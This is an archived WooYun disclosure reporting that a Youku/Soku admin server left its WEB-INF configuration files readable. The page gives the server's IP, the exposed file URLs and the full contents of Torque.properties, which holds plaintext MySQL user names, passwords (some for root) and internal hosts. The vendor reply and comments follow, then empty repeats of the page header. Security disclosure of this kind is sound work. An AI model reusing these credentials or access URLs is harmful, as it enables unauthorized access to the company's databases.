优酷某分站核心配置文件可读取泄露大量敏感信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085602

漏洞标题：优酷某分站核心配置文件可读取泄露大量敏感信息

漏洞作者：路人甲

提交时间：2014-12-02 18:49

修复时间：2015-01-16 18:50

公开时间：2015-01-16 18:50

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-02：细节已通知厂商并且等待厂商处理中
2014-12-02：厂商已经确认，细节仅向厂商公开
2014-12-12：细节向核心白帽子及相关领域专家公开
2014-12-22：细节向普通白帽子公开
2015-01-01：细节向实习白帽子公开
2015-01-16：细节向公众公开

简要描述：

优酷某分站核心配置文件可读取泄露大量敏感信息( 包含数据库信息 )

详细说明：

http://manage.soku.com 这里是 SOKU 的后台

http://211.151.146.96:81/WEB-INF/web.xml

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
<display-name>yk_cas_demo</display-name>
<!--
 Cas config start 详细的配置方法参见：https://wiki.jasig.org/display/CASC/CAS+Client+for+Java+3.1
-->
<context-param>
<param-name>serverName</param-name>
<param-value>http://manage.soku.com</param-value>
</context-param>
<context-param>
<param-name>redirect_url</param-name>
<param-value>/Security_main.do</param-value>
<!--  这里配置的是你的服务器的信息  -->
</context-param>
<servlet>
<servlet-name>StartupServlet</servlet-name>
<servlet-class>com.youku.soku.InitServlet</servlet-class>
<init-param>
<param-name>config_home</param-name>
<param-value>WEB-INF/soku-conf/</param-value>
</init-param>
<init-param>
<param-name>torque</param-name>
<param-value>WEB-INF/soku-conf/Torque.properties</param-value>
</init-param>
<init-param>
<param-name>log4j</param-name>
<param-value>WEB-INF/soku-conf/log4j.xml</param-value>
</init-param>
<init-param>
<param-name>memcached</param-name>
<param-value>WEB-INF/soku-conf/memcached.properties</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<filter>
<filter-name>CAS_Authentication_Filter</filter-name>
<filter-class>
org.jasig.cas.client.authentication.AuthenticationFilter
</filter-class>
<init-param>
<param-name>casServerLoginUrl</param-name>
<param-value>http://211.151.146.96:8080/login</param-value>
<!--  这里是CAS服务器的登录地址，请使用wiki上写的登录地址  -->
</init-param>
</filter>
<filter>
<filter-name>CAS_Validation_Filter</filter-name>
<filter-class>
org.jasig.cas.client.validation.Saml11TicketValidationFilter
</filter-class>
<init-param>
<param-name>casServerUrlPrefix</param-name>
<param-value>http://10.103.51.107</param-value>
<!--  这里是CAS服务器前缀，请使用wiki上写的前缀  -->
</init-param>
</filter>
<filter>
<filter-name>CAS_HttpServletRequest_Wrapper_Filter</filter-name>
<filter-class>
org.jasig.cas.client.util.HttpServletRequestWrapperFilter
</filter-class>
</filter>
<!-- 注意3个Filter的顺序，不能变 -->
<filter-mapping>
<filter-name>CAS_Authentication_Filter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CAS_Validation_Filter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CAS_HttpServletRequest_Wrapper_Filter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter>
<filter-name>Struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
</filter>
<filter-mapping>
<filter-name>Struts2</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<!--  上面3个和下面的三个一样，只不过一个对应的是jsp，另一个是.do的URL类型  -->
<!--
Single Sign Out start 登出配置，是指当用户从别的系统登出的时候，同时也能将你的系统的会话注销
-->
<filter>
<filter-name>CAS_Single_Sign_Out_Filter</filter-name>
<filter-class>org.jasig.cas.client.session.SingleSignOutFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>CAS_Single_Sign_Out_Filter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<listener>
<listener-class>
org.jasig.cas.client.session.SingleSignOutHttpSessionListener
</listener-class>
</listener>
<!-- Single Sign Out end -->
<!--  Cas config end -->
<welcome-file-list>
<welcome-file>Security_main.do</welcome-file>
</welcome-file-list>
</web-app>

漏洞证明：

http://211.151.146.96:81/WEB-INF/soku-conf/Torque.properties

torque.applicationRoot = .
torque.defaults.pool.maxWait = 10000
torque.database.default = so
torque.database.so.adapter = mysql
torque.dsfactory.so.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.so.pool.maxIdle=50
torque.dsfactory.so.pool.maxActive=100
torque.dsfactory.so.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.so.pool.validationQuery=SELECT 1
torque.dsfactory.so.connection.url = jdbc:mysql://10.103.8.10:3306/spider?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.so.connection.user = yoqoo
torque.dsfactory.so.connection.password = yoqoo
torque.dsfactory.scarab.datasource.logInterval = 1
torque.idbroker.clever.quantity = false
torque.idbroker.prefetch = true
torque.manager.useCache = true
torque.database.name =youku
torque.database.youku.adapter = mysql
torque.dsfactory.youku.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.youku.pool.maxIdle=50
torque.dsfactory.youku.pool.maxActive=100
torque.dsfactory.youku.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.youku.pool.validationQuery=SELECT 1
torque.dsfactory.youku.connection.url = jdbc:mysql://10.103.7.16:3306/yoqoo?useUnicode=true&characterEncoding=8859_1
torque.dsfactory.youku.connection.user = yoqoo
torque.dsfactory.youku.connection.password = dswybs-yoqoo
torque.database.name =youkumap
torque.database.youkumap.adapter = mysql
torque.dsfactory.youkumap.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.youkumap.pool.maxIdle=50
torque.dsfactory.youkumap.pool.maxActive=100
torque.dsfactory.youkumap.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.youkumap.pool.validationQuery=SELECT 1
torque.dsfactory.youkumap.connection.url = jdbc:mysql://10.103.2.206:3306/yoqoo?useUnicode=true&characterEncoding=8859_1
torque.dsfactory.youkumap.connection.user = root
torque.dsfactory.youkumap.connection.password = yhnji-db-yoqoo
torque.database.name = soku_library
torque.database.soku_library.adapter = mysql
torque.dsfactory.soku_library.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.soku_library.pool.maxIdle=100
torque.dsfactory.soku_library.pool.maxActive=200
torque.dsfactory.soku_library.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.soku_library.pool.validationQuery=SELECT 1
torque.dsfactory.soku_library.connection.url = jdbc:mysql://10.103.8.9:3306/soku_odshow1?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8&noDatetimeStringSync=true&&zeroDateTimeBehavior=convertToNull
torque.dsfactory.soku_library.connection.user = yoqoo
torque.dsfactory.soku_library.connection.password = yoqoo
torque.database.name = search_stat
torque.database.search_stat.adapter = mysql
torque.dsfactory.search_stat.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.search_stat.pool.maxIdle=50
torque.dsfactory.search_stat.pool.maxActive=100
torque.dsfactory.search_stat.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.search_stat.pool.validationQuery=SELECT 1
torque.dsfactory.search_stat.connection.url = jdbc:mysql://10.100.56.14:3306/search_stat?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.search_stat.connection.user = sokustat-sys
torque.dsfactory.search_stat.connection.password = SRXtc7etf5tpc
torque.database.name = search_stat_soku
torque.database.search_stat_soku.adapter = mysql
torque.dsfactory.search_stat_soku.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.search_stat_soku.pool.maxIdle=50
torque.dsfactory.search_stat_soku.pool.maxActive=100
torque.dsfactory.search_stat_soku.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.search_stat_soku.pool.validationQuery=SELECT 1
torque.dsfactory.search_stat_soku.connection.url = jdbc:mysql://10.100.56.14:3306/search_stat_soku?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.search_stat_soku.connection.user = sokustat-sys
torque.dsfactory.search_stat_soku.connection.password = SRXtc7etf5tpc
torque.database.name = searchrecommend
torque.database.searchrecommend.adapter = mysql
torque.dsfactory.searchrecommend.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.searchrecommend.pool.maxIdle=50
torque.dsfactory.searchrecommend.pool.maxActive=100
torque.dsfactory.searchrecommend.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.searchrecommend.pool.validationQuery=SELECT 1
torque.dsfactory.searchrecommend.connection.url = jdbc:mysql://10.100.56.14:3306/search_recomend?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.searchrecommend.connection.user = sokustat-sys
torque.dsfactory.searchrecommend.connection.password = SRXtc7etf5tpc
torque.database.name = soku
torque.database.soku.adapter = mysql
torque.dsfactory.soku.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.soku.pool.maxIdle=10
torque.dsfactory.soku.pool.maxActive=20
torque.dsfactory.soku.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.soku.pool.validationQuery=SELECT 1
torque.dsfactory.soku.connection.url = jdbc:mysql://10.100.56.14:3306/soku?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.soku.connection.user = sokustat-sys
torque.dsfactory.soku.connection.password = SRXtc7etf5tpc
torque.database.name = searchteleplay
torque.database.searchteleplay.adapter = mysql
torque.dsfactory.searchteleplay.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.searchteleplay.pool.maxIdle=50
torque.dsfactory.searchteleplay.pool.maxActive=100
torque.dsfactory.searchteleplay.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.searchteleplay.pool.validationQuery=SELECT 1
torque.dsfactory.searchteleplay.connection.url = jdbc:mysql://10.100.56.14:3306/search_teleplay?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.searchteleplay.connection.user = sokustat-sys
torque.dsfactory.searchteleplay.connection.password = SRXtc7etf5tpc
torque.dsfactory.name = lib_data
torque.database.lib_data.adapter = mysql
torque.dsfactory.lib_data.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.lib_data.pool.maxIdle=50
torque.dsfactory.lib_data.pool.maxActive=100
torque.dsfactory.lib_data.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.lib_data.pool.validationQuery=SELECT 1
torque.dsfactory.lib_data.connection.url = jdbc:mysql://10.103.8.10:3306/zhidaspider?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.lib_data.connection.user = yoqoo
torque.dsfactory.lib_data.connection.password = yoqoo
torque.dsfactory.scarab.datasource.logInterval = 1
torque.database.name = category
torque.database.category.adapter = mysql
torque.dsfactory.category.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.category.pool.maxIdle=50
torque.dsfactory.category.pool.maxActive=100
# torque.dsfactory.category.connection.driver = org.gjt.mm.mysql.Driver
torque.dsfactory.category.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.category.pool.validationQuery=SELECT 1
torque.dsfactory.category.connection.url = jdbc:mysql://10.103.2.206:3306/yoqoo?useUnicode=true&characterEncoding=8859_1
torque.dsfactory.category.connection.user = root
torque.dsfactory.category.connection.password = yhnji-db-yoqoo
torque.database.name = query_parse
torque.database.query_parse.adapter = mysql
torque.dsfactory.query_parse.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.query_parse.pool.maxIdle=10
torque.dsfactory.query_parse.pool.maxActive=20
torque.dsfactory.query_parse.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.query_parse.pool.validationQuery=SELECT 1
torque.dsfactory.query_parse.connection.url = jdbc:mysql://10.100.56.14:3306/query_parse?useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.query_parse.connection.user = sokustat-sys
torque.dsfactory.query_parse.connection.password = SRXtc7etf5tpc
torque.database.name = new_soku_top
torque.database.new_soku_top.adapter = mysql
torque.dsfactory.new_soku_top.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.new_soku_top.pool.maxIdle=20
torque.dsfactory.new_soku_top.pool.maxActive=100
torque.dsfactory.new_soku_top.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.new_soku_top.pool.validationQuery=SELECT 1
torque.dsfactory.new_soku_top.connection.url = jdbc:mysql://10.100.56.13:3306/new_soku_top?useUnicode=true&characterEncoding=UTF-8&noDatetimeStringSync=true&&zeroDateTimeBehavior=convertToNull
torque.dsfactory.new_soku_top.connection.user = soku-sys
torque.dsfactory.new_soku_top.connection.password = 2RStcXetf5tR2
torque.database.name = survey
torque.database.survey.adapter = mysql
torque.dsfactory.survey.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.survey.pool.maxIdle=100
torque.dsfactory.survey.pool.maxActive=200
torque.dsfactory.survey.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.survey.pool.validationQuery=SELECT 1
torque.dsfactory.survey.connection.url = jdbc:mysql://10.103.8.9:3306/survey?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.survey.connection.user = yoqoo
torque.dsfactory.survey.connection.password = yoqoo
torque.database.name = youku_log
torque.database.youku_log.adapter = mysql
torque.dsfactory.youku_log.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.youku_log.pool.maxIdle=20
torque.dsfactory.youku_log.pool.maxActive=100
torque.dsfactory.youku_log.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.youku_log.pool.validationQuery=SELECT 1
torque.dsfactory.youku_log.connection.url = jdbc:mysql://10.100.56.14:3306/youku_log?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.youku_log.connection.user = sokustat-sys
torque.dsfactory.youku_log.connection.password = SRXtc7etf5tpc
torque.database.name = soku_odshow
torque.database.soku_odshow.adapter = mysql
torque.dsfactory.soku_odshow.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.soku_odshow.pool.maxIdle=100
torque.dsfactory.soku_odshow.pool.maxActive=200
torque.dsfactory.soku_odshow.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.soku_odshow.pool.validationQuery=SELECT 1
torque.dsfactory.soku_odshow.connection.url = jdbc:mysql://10.100.55.25:3306/soku_odshow?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8&noDatetimeStringSync=true&&zeroDateTimeBehavior=convertToNull
torque.dsfactory.soku_odshow.connection.user = soku-select
torque.dsfactory.soku_odshow.connection.password = 1LYtSEXuf6cS
torque.database.name = spider23
torque.database.spider23.adapter = mysql
torque.dsfactory.spider23.factory = org.apache.torque.dsfactory.SharedPoolDataSourceFactory
torque.dsfactory.spider23.pool.maxIdle=20
torque.dsfactory.spider23.pool.maxActive=100
torque.dsfactory.spider23.connection.driver = com.mysql.jdbc.Driver
torque.dsfactory.spider23.pool.validationQuery=SELECT 1
torque.dsfactory.spider23.connection.url = jdbc:mysql://10.12.0.23:3306/spider?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8
torque.dsfactory.spider23.connection.user = yoqoo
torque.dsfactory.spider23.connection.password = yoqoo

修复方案：

目录访问做限制

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-12-02 19:01

厂商回复：

多谢提醒，马上修复。

漏洞评价：

2014-12-02 22:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

宝宝，你有匿名。。
2014-12-02 22:45 | 瘦蛟舞 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

@px1624 大神如何看匿名？
2014-12-02 22:47 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

@瘦蛟舞很简单，审核的时候他在群里让管理“求审核”，我看就是这个标题
2014-12-02 22:57 | 瘦蛟舞 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

@px1624 机智
2014-12-25 12:32 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@px1624 宝宝是哪个？XFK？还是

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085602

漏洞标题：优酷某分站核心配置文件可读取泄露大量敏感信息

相关厂商：优酷

漏洞作者：路人甲

提交时间：2014-12-02 18:49

修复时间：2015-01-16 18:50

公开时间：2015-01-16 18:50

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085602

漏洞标题：优酷某分站核心配置文件可读取 泄露大量敏感信息

相关厂商：优酷

漏洞作者： 路人甲

提交时间：2014-12-02 18:49

修复时间：2015-01-16 18:50

公开时间：2015-01-16 18:50

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085602"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞标题：优酷某分站核心配置文件可读取泄露大量敏感信息

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云